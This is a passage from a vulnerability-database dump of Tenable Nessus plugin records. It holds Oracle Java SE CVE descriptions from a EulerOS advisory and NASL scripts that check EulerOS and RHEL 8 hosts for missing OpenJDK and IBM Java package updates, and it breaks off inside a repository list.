SE\n (component: 2D). Supported versions that are affected\n are Java SE: 11.0.4 and 13. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2987)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2988)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. While the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access\n to critical data or all Java SE, Java SE Embedded\n accessible data.(CVE-2019-2989)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2992)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Javadoc). Supported versions that are\n affected are Java SE: 7u231, 8u221, 11.0.4 and 13.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks require human interaction from a person other\n than the attacker and while the vulnerability is in\n Java SE, attacks may significantly impact additional\n products. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE accessible data as well as\n unauthorized read access to a subset of Java SE\n accessible data.(CVE-2019-2999)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2583)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-2590)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in takeover of\n Java SE, Java SE Embedded.(CVE-2020-2604)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE.(CVE-2020-2654)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u241 and 8u231\n Java SE Embedded: 8u231. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2659)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1310\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa787a18\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.8.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"java-1.8.0-openjdk-1.8.0.191.b12-0.h15\",\n \"java-1.8.0-openjdk-devel-1.8.0.191.b12-0.h15\",\n \"java-1.8.0-openjdk-headless-1.8.0.191.b12-0.h15\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-20T14:09:42", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0530 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 3.7, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2021-02-16T00:00:00", "title": "RHEL 8 : java-1.8.0-ibm (RHSA-2021:0530)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-16T00:00:00", "cpe": ["cpe:/a:redhat:enterprise_linux:8::crb", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-plugin", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm", "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::resilientstorage", "cpe:/a:redhat:enterprise_linux:8::appstream", "cpe:/a:redhat:enterprise_linux:8::sap_hana", "cpe:/a:redhat:enterprise_linux:8::sap", "cpe:/a:redhat:enterprise_linux:8::realtime", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-headless", "cpe:/a:redhat:enterprise_linux:8::nfv", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-webstart", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-jdbc", "cpe:/a:redhat:enterprise_linux:8::highavailability", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-src", "cpe:/a:redhat:enterprise_linux:8::supplementary"], "id": "REDHAT-RHSA-2021-0530.NASL", "href": "https://www.tenable.com/plugins/nessus/146533", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0530. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146533);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2020-14779\", \"CVE-2020-14796\", \"CVE-2020-14797\");\n script_xref(name:\"RHSA\", value:\"2021:0530\");\n\n script_name(english:\"RHEL 8 : java-1.8.0-ibm (RHSA-2021:0530)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0530 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14796\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0530\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889697\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889717\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14797\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(20, 770);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::crb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::supplementary\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-webstart\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_8_appstream': [\n 'rhel-8-for-aarch64-appstream-debug-rpms',\n 'rhel-8-for-aarch64-appstream-rpms',\n 'rhel-8-for-aarch64-appstream-source-rpms',\n 'rhel-8-for-s390x-appstream-debug-rpms',\n 'rhel-8-for-s390x-appstream-rpms',\n 'rhel-8-for-s390x-appstream-source-rpms',\n 'rhel-8-for-x86_64-appstream-debug-rpms',\n 'rhel-8-for-x86_64-appstream-rpms',\n 'rhel-8-for-x86_64-appstream-source-rpms'\n ],\n 'enterprise_linux_8_baseos': [\n 'rhel-8-for-aarch64-baseos-debug-rpms',\n 'rhel-8-for-aarch64-baseos-rpms',\n 'rhel-8-for-aarch64-baseos-source-rpms',\n 'rhel-8-for-s390x-baseos-debug-rpms',\n 'rhel-8-for-s390x-baseos-rpms',\n 'rhel-8-for-s390x-baseos-source-rpms',\n 'rhel-8-for-x86_64-baseos-debug-rpms',\n 'rhel-8-for-x86_64-baseos-rpms',\n 'rhel-8-for-x86_64-baseos-source-rpms'\n ],\n 'enterprise_linux_8_crb': [\n 'codeready-builder-for-rhel-8-aarch64-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-aarch64-rpms',\n 'codeready-builder-for-rhel-8-aarch64-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-rpms',\n 'codeready-builder-for-rhel-8-s390x-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-rpms',\n 'codeready-builder-for-rhel-8-x86_64-source-rpms'\n ],\n 'enterprise_linux_8_highavailability': [\n 'rhel-8-for-aarch64-highavailability-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms',\n 'rhel-8-for-aarch64-highavailability-rpms',\n 'rhel-8-for-aarch64-highavailability-source-rpms',\n 'rhel-8-for-s390x-highavailability-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-rpms',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms',\n 'rhel-8-for-s390x-highavailability-rpms',\n 'rhel-8-for-s390x-highavailability-source-rpms',\n 'rhel-8-for-x86_64-highavailability-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-rpms',\n 'rhel-8-for-x86_64-highavailability-source-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms'\n ],\n 'enterprise_linux_8_nfv': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-nfv-tus-debug-rpms',\n 'rhel-8-for-x86_64-nfv-tus-rpms',\n 'rhel-8-for-x86_64-nfv-tus-source-rpms'\n ],\n 'enterprise_linux_8_realtime': [\n 'rhel-8-for-x86_64-rt-debug-rpms',\n 'rhel-8-for-x86_64-rt-rpms',\n 'rhel-8-for-x86_64-rt-source-rpms',\n 'rhel-8-for-x86_64-rt-tus-debug-rpms',\n 'rhel-8-for-x86_64-rt-tus-rpms',\n 'rhel-8-for-x86_64-rt-tus-source-rpms'\n 